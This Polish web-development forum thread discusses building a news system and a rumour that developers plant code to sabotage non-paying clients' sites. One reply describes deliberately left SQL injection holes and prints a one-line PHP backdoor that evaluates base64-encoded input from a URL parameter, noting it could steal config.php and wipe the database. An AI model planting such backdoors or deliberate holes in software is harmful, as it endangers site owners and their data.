System newsów

0

Witam
Mam kilka szybkich pytań.

Potrzebny mi jest system newsów, który może dodawać newsy w różnych miejscach strony. Chodzi o to że strona posiada kilka div'ów gdzie zamieszane są informacje, które często są aktualizowane i potrzebny jest szybki sposób ich edycji. CuteNews się w tym momencie nie sprawdza.
Istnieje gdzieś w sieci już taki skrypt, czy muszę pisać swój, ewentualnie czy da się przerobić CuteNews by działa w wyżej opisany sposób?

Pytanie drugie. Czytałem gdzieś na forum, że osoby tworzące serwisy internetowe na zamówienie zabezpieczają się przed nieuczciwymi klientami umieszczając w kodze kilka dodatkowych linijek, które w razie potrzeby można wykorzystać do zablokowania/wysypania się strony owego klienta.
Czy ten kilka linijek tyczy się umieszczenia części bazy danych/grafiki na innym serwerze do którego ma dostęp twórca strony?

0

O nieeee... Chodzi o proste exploity, na przykład podatność na SQL Injection celowo umożliwiona w konkretnym miejscu, albo jakiś tajny kod w środku pliku np.:

if ($_GET['pupodupcy']) {eval(base64_decode($_GET['pupodupcy']));}

W ten sposób możnaby wykraść zawartość config.php i wyczyścić dane w bazie.

0

A czy istnieje jakiś konkretny kurs, z którego można by się tego nauczyć? Zielony w SQL'u i PHP nie jestem, ale do jakichś poważniejszych umiejętności jeszcze daleka droga, dlatego zwyczajnie nie wiem gdzie mam zacząć i czego szukać :/

0

Nie ma nikogo, kto mógłby mi doradzić z tymi newsami? ^^

0

A ja chcę napisać pracę doktorską z nanotechnologii bez jakiejkolwiek o tym wiedzy.

0

Bezpodstawna głupia uwaga. Chyba wyraźnie napisałem, że potrafię sobie taki system newsów zrobić, ale będzie mało profesjonalny, zresztą już go zacząłem robić i może nie będę musiał kończyć, bo ktoś zna system o który mi chodzi.

I nie proszę nikogo o gotowca, tylko na naprowadzenie, a na tym chyba nauka polega, że jak ktoś czegoś nie wie, to osoby które takową wiedzę posiadają dzielą się nią i pomagają wpoić ją innym. Po to jest to forum, by pomagać takim jak ja, jak tego Monk nie rozumiesz to nie wiem co tu robisz.

Napisałeś, że chodzi o ort!, a ja ci nie kazałem napisać mi gotowca, tylko poprosiłem cię o jakąś sensowną stronę bym mógł o nich poczytać i rozwiązać swój problem. Co z tego że ja znajdę stronę gdzie coś o nich pisze, jak to jakaś mączka będzie, a ty z tego co zrozumiałem orientujesz się w temacie i chyba wiesz który kurs warto przeczytać. Nie chcesz pomagać to proszę powstrzymaj się od głupich uwag.

0

Akurat nie przypominam sobie żebym czytał kurs o explo w PHP. Po prostu mi tak to samo wyszło...

Co do systemu newsów - jest kilka prostych zasad.
Jeśli chcesz napisać wydajną aplikację, wszystko co będzie składane w serie chowaj do bazy danych. Umiejętnie używaj indeksów i projektuj struktury tabel wcześniej myśląc "co będzie jeżeli..." i sprawdzając różne rozwiązania w różnych skryptach (byle nie PHP-Fusion ;p). Jeśli lubisz dużo przykładów to polecam lekturę:
Jak stworzyć własny CMS (Wydawnictwo Nakom - 2007)

0

Bazę wzorowałem na bazie CuteNews i dodałem kilka kolumn od siebie, między innymi tą z pozycją newsa. W różnych miejscach strony umieszczę kod, wczytujący zawartość tabeli w zależności od spełnionego warunku, którym będzie numer pozycji (1-lewa, 2-środek... itd.)

A co do PHP-Fusion, to sparzyłem się na nim już jakiś czas temu i teraz polegam tylko na własnych rozwiązaniach (nie licząc systemów newsów).

Dzięki za wskazówki Monk, na pewno z nich skorzystam.

1 użytkowników online, w tym zalogowanych: 0, gości: 1